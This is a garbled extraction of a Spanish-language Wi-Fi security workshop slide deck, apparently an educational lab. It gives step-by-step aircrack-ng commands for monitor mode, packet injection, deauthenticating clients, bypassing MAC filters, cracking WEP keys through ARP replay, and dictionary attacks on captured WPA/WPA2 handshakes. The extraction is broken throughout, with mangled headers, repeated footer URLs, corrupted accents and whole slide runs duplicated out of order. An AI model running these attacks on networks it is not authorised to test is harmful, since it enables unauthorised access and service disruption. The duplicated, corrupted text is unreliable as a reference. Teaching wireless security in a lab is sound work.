bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
